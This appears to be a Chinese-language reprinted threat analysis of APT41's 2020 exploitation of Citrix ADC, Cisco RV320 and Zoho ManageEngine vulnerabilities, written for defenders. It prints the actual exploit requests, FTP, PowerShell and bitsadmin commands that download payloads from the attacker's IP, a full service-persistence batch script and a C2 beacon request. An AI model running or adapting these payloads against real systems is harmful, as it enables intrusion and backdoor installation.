如何進(jìn)行APT41多漏洞網(wǎng)絡(luò)攻擊的分析

本篇文章給大家分享的是有關(guān)如何進(jìn)行APT41多漏洞網(wǎng)絡(luò)攻擊的分析，小編覺(jué)得挺實(shí)用的，因此分享給大家學(xué)習(xí)，希望大家閱讀完這篇文章后可以有所收獲，話不多說(shuō)，跟著小編一起來(lái)看看吧。

漏洞利用

CVE-2019-19781 (Citrix Application Delivery Controller [ADC])

2020年1月20日開(kāi)始，APT41使用IP地址66.42.98 [.] 220嘗試?yán)寐┒碈VE-2019-19781（于2019年12月17日發(fā)布）。

時(shí)間線：

最初利用CVE-2019-19781攻擊發(fā)生在2020年1月20日和2020年1月21日，攻擊活動(dòng)中會(huì)執(zhí)行命令‘file /bin/pwd’。 首先將確認(rèn)系統(tǒng)是否存在漏洞，有沒(méi)有部署相關(guān)漏洞緩解措施。 其次返回目標(biāo)體系結(jié)構(gòu)相關(guān)信息，為APT41后續(xù)部署后門(mén)提供信息。

所有觀察到的請(qǐng)求僅針對(duì)Citrix設(shè)備執(zhí)行，APT41利用已知設(shè)備列表進(jìn)行操作。

HTTP POST示例：

POST /vpns/portal/scripts/newbm.pl HTTP/1.1
Host: [redacted]
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
NSC_NONCE: nsroot
NSC_USER: ../../../netscaler/portal/templates/[redacted]
Content-Length: 96

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]

1月23日至2月1日之間APT41活動(dòng)暫停，從2月1日開(kāi)始APT41開(kāi)始使用CVE-2019-19781漏洞，這些載荷通過(guò)FTP下載。 APT41執(zhí)行命令'/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’，連接到66.42.98 [.] 220，使用用戶名“ test”和密碼登錄到FTP服務(wù)器，然后下載“ bsd”有效負(fù)載（可能是后門(mén)）。

HTTP POST示例：

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1Accept-Encoding: identityContent-Length: 147Connection: closeNsc_User: ../../../netscaler/portal/templates/[redacted]User-Agent: Python-urllib/2.7Nsc_Nonce: nsrootHost: [redacted]Content-Type: application/x-www-form-urlencodedurl=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd`') %]

2月24日和2月25日CVE-2019-19781的利用次數(shù)顯著增加，僅載荷名發(fā)生了變化。

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1Accept-Encoding: identityContent-Length: 145Connection: closeNsc_User: ../../../netscaler/portal/templates/[redacted]User-Agent: Python-urllib/2.7Nsc_Nonce: nsrootHost: [redacted]Content-Type: application/x-www-form-urlencodedurl=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un`') %]

Cisco Router

2020年2月21日APT41成功攻擊了一家電信組織的Cisco RV320路由器，并下載了為名為“ fuc”（MD5：155e98e5ca8d662fad7dc84187340cbc）的64位MIPS有效負(fù)載。Metasploit模塊結(jié)合了兩個(gè)CVE（CVE-2019-1653和CVE-2019-1652）在Cisco RV320和RV325小型企業(yè)路由器上實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行，并使用wget下載有效負(fù)載。

66.42.98 [.] 220還托管了文件http://66.42.98[.] 220/test/1.txt(MD5：c0c467c8e9b2046d7053642cc9bdd57d)的內(nèi)容為“ cat/etc/flash/etc/nk_sysconfig”，該命令可在Cisco RV320路由器上執(zhí)行顯示當(dāng)前配置。

Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability

Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability

CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)

3月5日研究人員發(fā)布了CVE-2020-10189驗(yàn)證代碼。 從3月8日開(kāi)始APT41使用91.208.184 [.] 78來(lái)試圖利用Zoho ManageEngine漏洞，有效負(fù)載（install.bat和storesyncsvc.dll）有兩個(gè)不同的變化。 在第一個(gè)變體中，使用CVE-2020-10189漏洞直接上傳“ logger.zip”，其中包含一組命令可使用PowerShell下載并執(zhí)行install.bat和storesyncsvc.dll。

java/lang/Runtime
getRuntime
()Ljava/lang/Runtime;
Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\
Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','
C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat
'(Ljava/lang/String;)Ljava/lang/Process;
StackMapTable
ysoserial/Pwner76328858520609
Lysoserial/Pwner76328858520609;

在第二個(gè)版本中APT41利用Microsoft BITSAdmin工具從66.42.98 [.] 220端口12345下載install.bat（MD5：7966c2c546b71e800397a67f942858d0）。

Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exeProcess Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat

兩種變體都使用install.bat批處理文件來(lái)安裝名為storesyncsvc.dll（MD5：5909983db4d9023e4098e56361c96a6f）。

install.bat內(nèi)容：

@echo offset "WORK_DIR=C:\Windows\System32"set "DLL_NAME=storesyncsvc.dll"set "SERVICE_NAME=StorSyncSvc"set "DISPLAY_NAME=Storage Sync Service"set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly." sc stop %SERVICE_NAME%sc delete %SERVICE_NAME%mkdir %WORK_DIR%copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Yreg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /fsc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000sc description "%SERVICE_NAME%" "%DESCRIPTION%"reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /freg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /fnet start "%SERVICE_NAME%"

與c2服務(wù)通聯(lián)：

GET /jquery-3.3.1.min.js HTTP/1.1Host: cdn.bootcss.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://cdn.bootcss.com/Accept-Encoding: gzip, deflateCookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYMDA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLIUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-Alive Cache-Control: no-cache

在攻擊利用幾個(gè)小時(shí)內(nèi)，APT41使用storecyncsvc.dll BEACON后門(mén)下載了具有不同C2地址的輔助后門(mén)，然后下載2.exe（MD5：3e856162c36b532925c8226b4ed3481c）。2.exe是VMProtected Meterpreter下載器，用于下載Cobalt Strike BEACON shellcode。該組利用多次入侵來(lái)延遲對(duì)其其他工具的分析。

APT41這次活動(dòng)中的掃描和攻擊體現(xiàn)了其漏洞利用速度越來(lái)越快，目標(biāo)信息搜集范圍逐步擴(kuò)大。此前美國(guó)防部確認(rèn)，APT41成功利用CVE-2019-3396（Atlassian Confluence）攻擊美國(guó)一所大學(xué)?？梢?jiàn)APT41在從事間諜活動(dòng)同時(shí)也在進(jìn)行以經(jīng)濟(jì)利益為動(dòng)機(jī)的網(wǎng)絡(luò)活動(dòng)。

以上就是如何進(jìn)行APT41多漏洞網(wǎng)絡(luò)攻擊的分析，小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘９ぷ鲿?huì)見(jiàn)到或用到的。希望你能通過(guò)這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注億速云行業(yè)資訊頻道